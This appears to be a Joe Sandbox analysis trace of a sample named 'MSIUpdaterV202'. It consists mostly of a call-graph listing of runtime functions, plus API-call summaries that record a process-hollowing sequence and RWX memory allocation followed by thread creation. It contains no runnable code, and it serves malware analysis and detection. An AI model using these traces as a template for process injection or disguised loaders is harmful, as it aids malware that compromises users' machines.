14269->14272 14270->14269 14271 c063ee __Getctype 14 API calls 14270->14271 14271->14269 14273 bfa6be std::_Lockit::~_Lockit LeaveCriticalSection 14272->14273 14274 c06691 14273->14274 14274->14264 14274->14265 14276 bfea50 __Getctype 41 API calls 14275->14276 14277 c04cf1 14276->14277 14278 c04c04 __strnicoll 41 API calls 14277->14278 14279 c04cfc 14278->14279 14279->14251 14281 c0492b GetCPInfo 14280->14281 14290 c049f4 14280->14290 14287 c04943 14281->14287 14281->14290 14283 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14285 c04aad 14283->14285 14285->14223 14291 c028d8 14287->14291 14289 c02bcf 45 API calls 14289->14290 14290->14283 14292 bfb0eb __strnicoll 41 API calls 14291->14292 14293 c028f8 14292->14293 14311 c03b78 14293->14311 14295 c029bc 14298 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14295->14298 14296 c029b4 14314 bf4466 14296->14314 14297 c02925 14297->14295 14297->14296 14300 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 14297->14300 14302 c0294a __fread_nolock __alloca_probe_16 14297->14302 14301 c029df 14298->14301 14300->14302 14306 c02bcf 14301->14306 14302->14296 14303 c03b78 __strnicoll MultiByteToWideChar 14302->14303 14304 c02995 14303->14304 14304->14296 14305 c029a0 GetStringTypeW 14304->14305 14305->14296 14307 bfb0eb __strnicoll 41 API calls 14306->14307 14308 c02be2 14307->14308 14321 c029e1 14308->14321 14312 c03b89 MultiByteToWideChar 14311->14312 14312->14297 14315 bf4481 14314->14315 14316 bf4470 14314->14316 14315->14295 14316->14315 14318 bfa61a 14316->14318 14319 bfed98 ___free_lconv_mon 14 API calls 14318->14319 14320 bfa632 14319->14320 14320->14315 14322 c029fc ctype 14321->14322 14323 c03b78 __strnicoll MultiByteToWideChar 14322->14323 14325 c02a42 14323->14325 14324 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14326 c02bcd 14324->14326 14327 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 14325->14327 14329 c02a68 __alloca_probe_16 14325->14329 14330 c02bba 14325->14330 14341 c02aee 14325->14341 14326->14289 14327->14329 14328 bf4466 __freea 14 API calls 14328->14330 14331 c03b78 __strnicoll MultiByteToWideChar 14329->14331 14329->14341 14330->14324 14332 c02aad 14331->14332 14332->14341 14349 bff442 14332->14349 14335 c02b17 14337 c02ba2 14335->14337 14338 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 14335->14338 14342 c02b29 __alloca_probe_16 14335->14342 14336 c02adf 14340 bff442 std::_Locinfo::_Locinfo_dtor 6 API calls 14336->14340 14336->14341 14339 bf4466 __freea 14 API calls 14337->14339 14338->14342 14339->14341 14340->14341 14341->14328 14342->14337 14343 bff442 std::_Locinfo::_Locinfo_dtor 6 API calls 14342->14343 14344 c02b6c 14343->14344 14344->14337 14355 c03bf4 14344->14355 14346 c02b86 14346->14337 14347 c02b8f 14346->14347 14348 bf4466 __freea 14 API calls 14347->14348 14348->14341 14350 bfef74 std::_Locinfo::_Locinfo_dtor 5 API calls 14349->14350 14351 bff44d 14350->14351 14352 bff49f __strnicoll 5 API calls 14351->14352 14354 bff453 14351->14354 14353 bff493 LCMapStringW 14352->14353 14353->14354 14354->14335 14354->14336 14354->14341 14356 c03c0b WideCharToMultiByte 14355->14356 14356->14346 14358->14228 14369 bf9bdd 14359->14369 14361 c04790 14362 bf9bdd __fread_nolock 41 API calls 14361->14362 14363 c047af 14362->14363 14364 c04744 14363->14364 14365 bfed98 ___free_lconv_mon 14 API calls 14363->14365 14366 c04762 14364->14366 14365->14364 14383 bfa6be LeaveCriticalSection 14366->14383 14368 c04750 14368->13881 14370 bf9bee 14369->14370 14379 bf9bea ctype 14369->14379 14371 bf9bf5 14370->14371 14375 bf9c08 __fread_nolock 14370->14375 14372 bfb0d8 __dosmaperr 14 API calls 14371->14372 14373 bf9bfa 14372->14373 14374 bf8ecf __strnicoll 41 API calls 14373->14374 14374->14379 14376 bf9c3f 14375->14376 14377 bf9c36 14375->14377 14375->14379 14376->14379 14380 bfb0d8 __dosmaperr 14 API calls 14376->14380 14378 bfb0d8 __dosmaperr 14 API calls 14377->14378 14381 bf9c3b 14378->14381 14379->14361 14380->14381 14382 bf8ecf __strnicoll 41 API calls 14381->14382 14382->14379 14383->14368 14385 bfdfc4 14384->14385 14387 bfdfd2 14384->14387 14385->14387 14391 bfdfea 14385->14391 14386 bfb0d8 __dosmaperr 14 API calls 14388 bfdfda 14386->14388 14387->14386 14390 bf8ecf __strnicoll 41 API calls 14388->14390 14389 bfdfe4 14389->13829 14390->14389 14391->14389 14392 bfb0d8 __dosmaperr 14 API calls 14391->14392 14392->14388 14397 bfbd37 14393->14397 14398 bfbd08 14393->14398 14394 bfbd4e 14396 bfed98 ___free_lconv_mon 14 API calls 14394->14396 14395 bfed98 ___free_lconv_mon 14 API calls 14395->14397 14396->14398 14397->14394 14397->14395 14398->13830 14400 bf8f08 14399->14400 14401 bf8cd3 __CreateFrameInfo 8 API calls 14400->14401 14402 bf8f1d GetCurrentProcess TerminateProcess 14401->14402 14402->13836 14405 bf10dc __EH_prolog3_catch _strlen 14403->14405 14428 bf185d 14405->14428 14409 bf126d ctype 14409->13640 14410 bf1135 14432 bf1c9d 14410->14432 14412 bf165b _strlen 14411->14412 14585 bf12de 14412->14585 14414 bf1668 14414->13642 14416 bf1c84 14415->14416 14418 bf1c5a std::ios_base::_Init 14415->14418 14592 bf1532 14416->14592 14418->13644 14612 c0c151 14419->14612 14421 c0c21f ctype 14618 c0c137 14421->14618 14425 bf1bf5 14424->14425 14426 bf1bfe 14424->14426 14427 bf13d9 _Deallocate 41 API calls 14425->14427 14426->13652 14427->14426 14429 bf186c 14428->14429 14431 bf188a 14429->14431 14444 bf1d88 14429->14444 14431->14410 14433 bf1265 14432->14433 14436 bf1cb4 std::ios_base::_Init 14432->14436 14439 bf1937 14433->14439 14434 bf1ced 14455 bf5842 14434->14455 14436->14434 14452 bf1803 14436->14452 14437 bf1d06 14567 bf1fd5 14439->14567 14441 bf193f 14443 bf1911 14441->14443 14571 bf1b4d 14441->14571 14443->14409 14445 bf1d94 __EH_prolog3_catch 14444->14445 14446 bf1e39 ctype 14445->14446 14447 bf185d 51 API calls 14445->14447 14446->14431 14450 bf1db3 14447->14450 14448 bf1e31 14449 bf1937 51 API calls 14448->14449 14449->14446 14450->14448 14451 bf1c9d std::ios_base::_Init 43 API calls 14450->14451 14451->14448 14458 bf18bd 14452->14458 14456 bf5889 RaiseException 14455->14456 14457 bf585c 14455->14457 14456->14437 14457->14456 14459 bf163e std::ios_base::_Init 43 API calls 14458->14459 14460 bf18dc 14459->14460 14467 bf16b8 14460->14467 14463 bf1bea std::ios_base::_Init 41 API calls 14464 bf18f5 14463->14464 14465 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14464->14465 14466 bf1818 14465->14466 14466->14434 14478 bf160a 14467->14478 14474 bf1bea std::ios_base::_Init 41 API calls 14475 bf16fb 14474->14475 14476 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14475->14476 14477 bf171a 14476->14477 14477->14463 14479 bf162a 14478->14479 14498 bf134f 14479->14498 14481 bf1637 14482 bf1acb 14481->14482 14483 bf1ae5 _strlen 14482->14483 14484 bf1afc 14482->14484 14485 bf1c44 std::ios_base::_Init 43 API calls 14483->14485 14486 bf1c44 std::ios_base::_Init 43 API calls 14484->14486 14485->14484 14487 bf1b23 14486->14487 14488 bf1bea std::ios_base::_Init 41 API calls 14487->14488 14489 bf1b2b std::ios_base::_Init 14488->14489 14490 bf1bea std::ios_base::_Init 41 API calls 14489->14490 14491 bf1b3e 14490->14491 14492 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14491->14492 14493 bf16e8 14492->14493 14494 bf183c 14493->14494 14495 bf1849 14494->14495 14549 bf17b6 14495->14549 14499 bf13b1 14498->14499 14500 bf1360 std::ios_base::_Init 14498->14500 14513 bf1c10 14499->14513 14504 bf1367 std::ios_base::_Init ctype 14500->14504 14505 bf127a 14500->14505 14504->14481 14506 bf1285 14505->14506 14508 bf128d 14505->14508 14516 bf129c 14506->14516 14507 bf1299 14507->14504 14508->14507 14530 bf46d5 14508->14530 14511 bf128b 14511->14504 14512 bf1297 14512->14504 14544 bf1f95 14513->14544 14517 bf1bcd Concurrency::cancel_current_task 14516->14517 14518 bf12ab 14516->14518 14521 bf5842 std::_Xinvalid_argument RaiseException 14517->14521 14519 bf46d5 ctype 43 API calls 14518->14519 14520 bf12b1 14519->14520 14522 bf12b8 14520->14522 14524 bf8e1b _Deallocate 41 API calls 14520->14524 14523 bf1be9 14521->14523 14522->14511 14525 bf1bfe 14523->14525 14527 bf13d9 _Deallocate 41 API calls 14523->14527 14526 bf8eee 14524->14526 14525->14511 14528 bf8efc _Deallocate 11 API calls 14526->14528 14527->14525 14529 bf8efb 14528->14529 14532 bf46da 14530->14532 14531 bfa6ec _Yarn 15 API calls 14531->14532 14532->14531 14533 bf46f4 14532->14533 14534 bfda13 ctype EnterCriticalSection LeaveCriticalSection 14532->14534 14535 bf46f6 14532->14535 14533->14512 14534->14532 14536 bf1bcd Concurrency::cancel_current_task 14535->14536 14538 bf4700 ctype 14535->14538 14537 bf5842 std::_Xinvalid_argument RaiseException 14536->14537 14539 bf1be9 14537->14539 14540 bf5842 std::_Xinvalid_argument RaiseException 14538->14540 14542 bf1bfe 14539->14542 14543 bf13d9 _Deallocate 41 API calls 14539->14543 14541 bf4ff1 14540->14541 14542->14512 14543->14542 14545 bf1f0f std::invalid_argument::invalid_argument 42 API calls 14544->14545 14546 bf1fa6 14545->14546 14547 bf5842 std::_Xinvalid_argument RaiseException 14546->14547 14548 bf1fb4 14547->14548 14552 bf57c0 14549->14552 14553 bf16f3 14552->14553 14554 bf57cd 14552->14554 14553->14474 14554->14553 14560 bfa6ec 14554->14560 14557 bf57fa 14559 bfa61a __freea 14 API calls 14557->14559 14558 bfdfb6 ___std_exception_copy 41 API calls 14558->14557 14559->14553 14565 c01dc1 __Getctype 14560->14565 14561 c01dff 14562 bfb0d8 __dosmaperr 14 API calls 14561->14562 14564 bf57ea 14562->14564 14563 c01dea HeapAlloc 14563->14564 14563->14565 14564->14557 14564->14558 14565->14561 14565->14563 14566 bfda13 ctype EnterCriticalSection LeaveCriticalSection 14565->14566 14566->14565 14567->14441 14568 bf5c5d 14567->14568 14575 bf790c 14568->14575 14570 bf5c62 14570->14441 14573 bf1b59 __EH_prolog3_catch 14571->14573 14572 bf1b95 ctype 14572->14443 14573->14572 14574 bf1c9d std::ios_base::_Init 43 API calls 14573->14574 14574->14572 14576 bf7918 GetLastError 14575->14576 14577 bf7915 14575->14577 14580 bf8a83 14576->14580 14577->14570 14581 bf8922 ___vcrt_FlsFree 5 API calls 14580->14581 14582 bf8a9d 14581->14582 14583 bf8ab5 TlsGetValue 14582->14583 14584 bf792d SetLastError 14582->14584 14583->14584 14584->14570 14586 bf1349 14585->14586 14588 bf12ef std::ios_base::_Init 14585->14588 14587 bf1c10 std::ios_base::_Init 43 API calls 14586->14587 14589 bf134e 14587->14589 14590 bf127a std::ios_base::_Init 43 API calls 14588->14590 14591 bf12f6 std::ios_base::_Init 14588->14591 14590->14591 14591->14414 14593 bf15bb 14592->14593 14596 bf154b std::ios_base::_Init 14592->14596 14594 bf1c10 std::ios_base::_Init 43 API calls 14593->14594 14595 bf15c0 14594->14595 14597 bf127a std::ios_base::_Init 43 API calls 14596->14597 14598 bf156a std::ios_base::_Init 14597->14598 14600 bf15a0 std::ios_base::_Init 14598->14600 14601 bf13d9 14598->14601 14600->14418 14602 bf13f3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14601->14602 14603 bf13e6 14601->14603 14602->14600 14605 bf1a16 14603->14605 14606 bf1a33 14605->14606 14607 bf1a30 14605->14607 14608 bf8e1b _Deallocate 41 API calls 14606->14608 14607->14602 14609 bf8eee 14608->14609 14610 bf8efc _Deallocate 11 API calls 14609->14610 14611 bf8efb 14610->14611 14614 c0c175 14612->14614 14615 c0c1dd 14612->14615 14613 bf13d9 _Deallocate 41 API calls 14616 c0c1f1 14613->14616 14614->14615 14621 bf1405 14614->14621 14615->14613 14615->14616 14616->14421 14649 c0c000 14618->14649 14622 bf1411 __EH_prolog3_catch 14621->14622 14628 bf149c ctype 14622->14628 14629 bf1c26 14622->14629 14626 bf1446 14636 bf1a93 14626->14636 14628->14614 14640 bf1c1b 14628->14640 14630 bf1c3e 14629->14630 14631 bf1c31 14629->14631 14643 bf1bcd 14630->14643 14633 bf127a std::ios_base::_Init 43 API calls 14631->14633 14635 bf1c3a 14633->14635 14635->14626 14637 bf1aab 14636->14637 14638 bf1a9b 14636->14638 14637->14628 14639 bf13d9 _Deallocate 41 API calls 14638->14639 14639->14637 14641 bf1f95 std::_Xinvalid_argument 43 API calls 14640->14641 14642 bf1c25 14641->14642 14644 bf1bdb Concurrency::cancel_current_task 14643->14644 14645 bf5842 std::_Xinvalid_argument RaiseException 14644->14645 14646 bf1be9 14645->14646 14647 bf1bfe 14646->14647 14648 bf13d9 _Deallocate 41 API calls 14646->14648 14648->14647 14658 bf12c7 14649->14658 14651 c0c037 14652 c0c112 14651->14652 14656 bf10d0 51 API calls 14651->14656 14661 bf14c8 14652->14661 14654 c0c11e 14655 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14654->14655 14657 c0c130 CreateThread WaitForSingleObjectEx CloseHandle 14655->14657 14656->14651 14657->13649 14659 bf46d5 ctype 43 API calls 14658->14659 14660 bf12ce 14659->14660 14660->14651 14664 bf14e8 14661->14664 14663 bf14d9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14663->14654 14667 bf14f2 14664->14667 14665 bf1514 14665->14663 14666 bf14e8 41 API calls 14666->14667 14667->14665 14667->14666 14669 bf1519 14667->14669 14670 bf1bea std::ios_base::_Init 41 API calls 14669->14670 14671 bf1526 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14670->14671 14671->14667 14673 bfc03f 14672->14673 14674 bfc051 14672->14674 14699 bfc0da GetModuleHandleW 14673->14699 14684 bfbeda 14674->14684 14679 bf46c2 14679->13679 14683 bfc0a3 14685 bfbee6 ___scrt_is_nonwritable_in_current_image 14684->14685 14707 bfa676 EnterCriticalSection 14685->14707 14687 bfbef0 14708 bfbf27 14687->14708 14689 bfbefd 14712 bfbf1b 14689->14712 14692 bfc0a9 14737 bfc11d 14692->14737 14695 bfc0c7 14697 bfc13f __CreateFrameInfo 3 API calls 14695->14697 14696 bfc0b7 GetCurrentProcess TerminateProcess 14696->14695 14698 bfc0cf ExitProcess 14697->14698 14700 bfc044 14699->14700 14700->14674 14701 bfc13f GetModuleHandleExW 14700->14701 14702 bfc19f 14701->14702 14703 bfc17e GetProcAddress 14701->14703 14705 bfc050 14702->14705 14706 bfc1a5 FreeLibrary 14702->14706 14703->14702 14704 bfc192 14703->14704 14704->14702 14705->14674 14706->14705 14707->14687 14709 bfbf33 ___scrt_is_nonwritable_in_current_image 14708->14709 14711 bfbf9a __CreateFrameInfo 14709->14711 14715 bfdd44 14709->14715 14711->14689 14736 bfa6be LeaveCriticalSection 14712->14736 14714 bfbf09 14714->14679 14714->14692 14716 bfdd50 __EH_prolog3 14715->14716 14719 bfda9c 14716->14719 14718 bfdd77 ctype 14718->14711 14720 bfdaa8 ___scrt_is_nonwritable_in_current_image 14719->14720 14727 bfa676 EnterCriticalSection 14720->14727 14722 bfdab6 14728 bfdc54 14722->14728 14727->14722 14729 bfdc73 14728->14729 14730 bfdac3 14728->14730 14729->14730 14731 bfed98 ___free_lconv_mon 14 API calls 14729->14731 14732 bfdaeb 14730->14732 14731->14730 14735 bfa6be LeaveCriticalSection 14732->14735 14734 bfdad4 14734->14718 14735->14734 14736->14714 14742 c053ce GetPEB 14737->14742 14740 bfc0b3 14740->14695 14740->14696 14741 bfc127 GetPEB 14741->14740 14743 bfc122 14742->14743 14744 c053e8 14742->14744 14743->14740 14743->14741 14746 bff0f6 14744->14746 14747 bff073 __Getctype 5 API calls 14746->14747 14748 bff112 14747->14748 14748->14743 14750 bfdef6 14749->14750 14753 bfdf08 ___scrt_uninitialize_crt 14749->14753 14751 bfdf04 14750->14751 14754 bf95ae 14750->14754 14751->13673 14753->13673 14757 bf943b 14754->14757 14760 bf932f 14757->14760 14761 bf933b ___scrt_is_nonwritable_in_current_image 14760->14761 14768 bfa676 EnterCriticalSection 14761->14768 14763 bf93b1 14777 bf93cf 14763->14777 14764 bf9345 ___scrt_uninitialize_crt 14764->14763 14769 bf92a3 14764->14769 14768->14764 14770 bf92af ___scrt_is_nonwritable_in_current_image 14769->14770 14780 bf9126 EnterCriticalSection 14770->14780 14772 bf92f2 14794 bf9323 14772->14794 14773 bf92b9 ___scrt_uninitialize_crt 14773->14772 14781 bf9549 14773->14781 14896 bfa6be LeaveCriticalSection 14777->14896 14779 bf93bd 14779->14751 14780->14773 14782 bf955e _Fputc 14781->14782 14783 bf9565 14782->14783 14784 bf9570 14782->14784 14785 bf943b ___scrt_uninitialize_crt 70 API calls 14783->14785 14797 bf94e0 14784->14797 14793 bf956b 14785->14793 14788 bf8c0b _Fputc 41 API calls 14790 bf95a8 14788->14790 14790->14772 14791 bf9591 14810 bffb11 14791->14810 14793->14788 14895 bf913a LeaveCriticalSection 14794->14895 14796 bf9311 14796->14764 14798 bf9520 14797->14798 14799 bf94f9 14797->14799 14798->14793 14803 bff839 14798->14803 14799->14798 14800 bff839 __fread_nolock 41 API calls 14799->14800 14801 bf9515 14800->14801 14821 c0033c 14801->14821 14804 bff85a 14803->14804 14805 bff845 14803->14805 14804->14791 14806 bfb0d8 __dosmaperr 14 API calls 14805->14806 14807 bff84a 14806->14807 14808 bf8ecf __strnicoll 41 API calls 14807->14808 14809 bff855 14808->14809 14809->14791 14811 bffb22 14810->14811 14814 bffb2f 14810->14814 14812 bfb0d8 __dosmaperr 14 API calls 14811->14812 14820 bffb27 14812->14820 14813 bffb78 14815 bfb0d8 __dosmaperr 14 API calls 14813->14815 14814->14813 14817 bffb56 14814->14817 14816 bffb7d 14815->14816 14818 bf8ecf __strnicoll 41 API calls 14816->14818 14862 bffa6f 14817->14862 14818->14820 14820->14793 14823 c00348 ___scrt_is_nonwritable_in_current_image 14821->14823 14822 c00350 14822->14798 14823->14822 14824 c0040c 14823->14824 14826 c0039d 14823->14826 14825 bf8e52 _Deallocate 29 API calls 14824->14825 14825->14822 14832 c0554d EnterCriticalSection 14826->14832 14828 c003a3 14829 c003c0 14828->14829 14833 c00444 14828->14833 14859 c00404 14829->14859 14832->14828 14834 c00469 14833->14834 14857 c0048c __fread_nolock 14833->14857 14835 c0046d 14834->14835 14837 c004cb 14834->14837 14836 bf8e52 _Deallocate 29 API calls 14835->14836 14836->14857 14838 c004e2 14837->14838 14840 c01c22 ___scrt_uninitialize_crt 43 API calls 14837->14840 14839 bfffc8 ___scrt_uninitialize_crt 42 API calls 14838->14839 14841 c004ec 14839->14841 14840->14838 14842 c00532 14841->14842 14843 c004f2 14841->14843 14846 c00595 WriteFile 14842->14846 14847 c00546 14842->14847 14844 c004f9 14843->14844 14845 c0051c 14843->14845 14852 bfff60 ___scrt_uninitialize_crt 6 API calls 14844->14852 14844->14857 14848 bffb8e ___scrt_uninitialize_crt 47 API calls 14845->14848 14849 c005b7 GetLastError 14846->14849 14846->14857 14850 c00583 14847->14850 14851 c0054e 14847->14851 14848->14857 14849->14857 14853 c00046 ___scrt_uninitialize_crt 7 API calls 14850->14853 14854 c00571 14851->14854 14855 c00553 14851->14855 14852->14857 14853->14857 14856 c0020a ___scrt_uninitialize_crt 8 API calls 14854->14856 14855->14857 14858 c00121 ___scrt_uninitialize_crt 7 API calls 14855->14858 14856->14857 14857->14829 14858->14857 14860 c05570 ___scrt_uninitialize_crt LeaveCriticalSection 14859->14860 14861 c0040a 14860->14861 14861->14822 14863 bffa7b ___scrt_is_nonwritable_in_current_image 14862->14863 14875 c0554d EnterCriticalSection 14863->14875 14865 bffa8a 14874 bffacf 14865->14874 14876 c05624 14865->14876 14866 bfb0d8 __dosmaperr 14 API calls 14869 bffad6 14866->14869 14868 bffab6 FlushFileBuffers 14868->14869 14870 bffac2 GetLastError 14868->14870 14892 bffb05 14869->14892 14889 bfb0c5 14870->14889 14874->14866 14875->14865 14877 c05631 14876->14877 14878 c05646 14876->14878 14879 bfb0c5 __dosmaperr 14 API calls 14877->14879 14880 bfb0c5 __dosmaperr 14 API calls 14878->14880 14884 c0566b 14878->14884 14881 c05636 14879->14881 14882 c05676 14880->14882 14883 bfb0d8 __dosmaperr 14 API calls 14881->14883 14885 bfb0d8 __dosmaperr 14 API calls 14882->14885 14887 c0563e 14883->14887 14884->14868 14886 c0567e 14885->14886 14888 bf8ecf __strnicoll 41 API calls 14886->14888 14887->14868 14888->14887 14890 bfeba1 __dosmaperr 14 API calls 14889->14890 14891 bfb0ca 14890->14891 14891->14874 14893 c05570 ___scrt_uninitialize_crt LeaveCriticalSection 14892->14893 14894 bffaee 14893->14894 14894->14820 14895->14796 14896->14779

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 013602FC
                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0136030F
                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0136032D
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01360351
                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0136037C
                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 013603D4
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0136041F
                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0136045D
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 01360499
                                  • ResumeThread.KERNELBASE(?), ref: 013604A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188593983.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1360000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                  • String ID: GetP$Load$aryA$ress
                                  • API String ID: 2687962208-977067982
                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction ID: 6821a04f7108e26dcf2ca569f9133da542bd0bf5b4365c359109c1aa5647ddaa
                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction Fuzzy Hash: FFB1E67660024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CAB345D774FA518B94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 23 bfefa8-bfefb4 24 bff046-bff049 23->24 25 bff04f 24->25 26 bfefb9-bfefca 24->26 27 bff051-bff055 25->27 28 bfefcc-bfefcf 26->28 29 bfefd7-bfeff0 LoadLibraryExW 26->29 30 bff06f-bff071 28->30 31 bfefd5 28->31 32 bff056-bff066 29->32 33 bfeff2-bfeffb GetLastError 29->33 30->27 35 bff043 31->35 32->30 34 bff068-bff069 FreeLibrary 32->34 36 bfeffd-bff00f call bfe6d8 33->36 37 bff034-bff041 33->37 34->30 35->24 36->37 40 bff011-bff023 call bfe6d8 36->40 37->35 40->37 43 bff025-bff032 LoadLibraryExW 40->43 43->32 43->37
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,34A80F21,?,00BFF0B5,?,?,00000000,00000000), ref: 00BFF069
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: 89aaf0074af9e4c16b338aa514c9aee687454c9486634d08e53773df4ced2d3c
                                  • Instruction ID: 333fbcc5cb969cc12821033035529ea9f7c4554a2f31b1fa3ee0148024b42966
                                  • Opcode Fuzzy Hash: 89aaf0074af9e4c16b338aa514c9aee687454c9486634d08e53773df4ced2d3c
                                  • Instruction Fuzzy Hash: 7C21D131A0121AABD7359B74AC84B7E3798DF12764F2501B0EB16AB292EB70ED05C690

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00C0C2E6), ref: 00C0C20B
                                    • Part of subcall function 00C0C151: _Deallocate.LIBCONCRT ref: 00C0C1EC
                                  • CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00C0C23F
                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00C0C2E6), ref: 00C0C24B
                                  • CloseHandle.KERNEL32(00000000,?,?,00C0C2E6), ref: 00C0C252
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                  • String ID: MZx$ole
                                  • API String ID: 440434604-1145851472
                                  • Opcode ID: 84f6a68eda495439d35f8b35121100a58b27627530a43599aa47d3d20b714068
                                  • Instruction ID: 1c6aaa94bb05f58f48f726a992f272cc82b0b13fd91380d38a9eaead940f4ed2
                                  • Opcode Fuzzy Hash: 84f6a68eda495439d35f8b35121100a58b27627530a43599aa47d3d20b714068
                                  • Instruction Fuzzy Hash: BDF0A7B620111C7FD12033A29C89FBF3E5CDB477E9F420220F70A911828A152C0292B5

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,00BFC0A3,00000000,00BF8CD2,?,?,34A80F21,00BF8CD2,?), ref: 00BFC0BA
                                  • TerminateProcess.KERNEL32(00000000,?,00BFC0A3,00000000,00BF8CD2,?,?,34A80F21,00BF8CD2,?), ref: 00BFC0C1
                                  • ExitProcess.KERNEL32 ref: 00BFC0D3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 7746d599943f5e4d0c7333fb548f8ff714cd8b78a9c4c8130e87669d15ae9680
                                  • Instruction ID: 8fb47c4faa3f15816ecf2db04a5322254e6bde0a42f239a119d063177b143dd0
                                  • Opcode Fuzzy Hash: 7746d599943f5e4d0c7333fb548f8ff714cd8b78a9c4c8130e87669d15ae9680
                                  • Instruction Fuzzy Hash: 25D0677140050CABCB112FA0EE0DA6D3F6AAB40399F054050BA0A5B032CF369AA7DA40

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 58 bff073-bff09b 59 bff09d-bff09f 58->59 60 bff0a1-bff0a3 58->60 61 bff0f2-bff0f5 59->61 62 bff0a9-bff0b0 call bfefa8 60->62 63 bff0a5-bff0a7 60->63 65 bff0b5-bff0b9 62->65 63->61 66 bff0bb-bff0c9 GetProcAddress 65->66 67 bff0d8-bff0ef 65->67 66->67 68 bff0cb-bff0d6 call bfb82a 66->68 69 bff0f1 67->69 68->69 69->61
                                  Memory Dump Source
